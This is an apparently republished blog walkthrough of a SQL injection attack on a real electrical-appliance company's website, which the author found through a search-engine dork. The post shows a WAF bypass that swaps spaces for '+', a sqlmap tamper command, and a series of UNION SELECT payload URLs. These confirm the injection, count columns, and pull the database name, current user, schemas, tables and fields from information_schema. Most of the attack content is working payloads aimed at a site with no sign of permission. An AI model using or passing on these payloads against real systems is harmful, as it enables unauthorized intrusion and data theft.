Home > Operation and Maintenance > Safety > How to conduct analysis to bypass WTS-WAF

How to conduct analysis to bypass WTS-WAF

王林
Release: 2023-05-13 09:40:12
forward
2078 people have browsed it


##0x01.Looking for the target

inurl:.php?id= intext:电器
Copy after login

I found the website of an electrical appliance company, and tested it casually, and found that there is waf

How to conduct analysis to bypass WTS-WAF

How to conduct analysis to bypass WTS-WAF

This has not been arranged yet (I found some information, it seems that just adding a sign instead of a space is enough, try it directly)

0x02.Operation

How to conduct analysis to bypass WTS-WAF

It was found that there is no waf interception

The information also said that

sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py
Copy after login
I tried the tool and found that it could not be started.

That’s it...

How to conduct analysis to bypass WTS-WAF

0x03.Hand Note

http://*/*.php?id=1+and+1=1  #回显正常
http://*/*.php?id=1+and+1=2  #回显错误
说明存在注入

http://*/*.php?id=1+order+by+15  #15回显错误
http://*/*.php?id=1+order+by+14  #14回显正常
说明有14个字段

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14  #-1让它错误然后执行后面
Copy after login

How to conduct analysis to bypass WTS-WAF

It echoed the 2nd and 8th

http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14  #查询当前数据库信息和当前用户
一些常见的函数
version()  #显示数据库当前版本
database() / schema()  #显示当前数据库名
user() / system_user() / session_user() / current_user() / current_user()  #显示当前用户名称
charset(str)  #返回字符串str的字符集
collation(str)  #返回字符串str的字符排列方式
Copy after login
0x04.Check data

Explosion database

http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1
Copy after login

How to conduct analysis to bypass WTS-WAF

它不能group_concat,那我就一个一个查了!
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #从1开始取一个
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1  #从2开始取一个
Copy after login
Explosive data table

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
Copy after login

How to conduct analysis to bypass WTS-WAF

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
Copy after login
Explosive data

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1
Copy after login

Summary:

1. If the tool cannot run, it can only be done by hand Note

2. Practice the manual note of mysql

The above is the detailed content of How to conduct analysis to bypass WTS-WAF. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:yisu.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template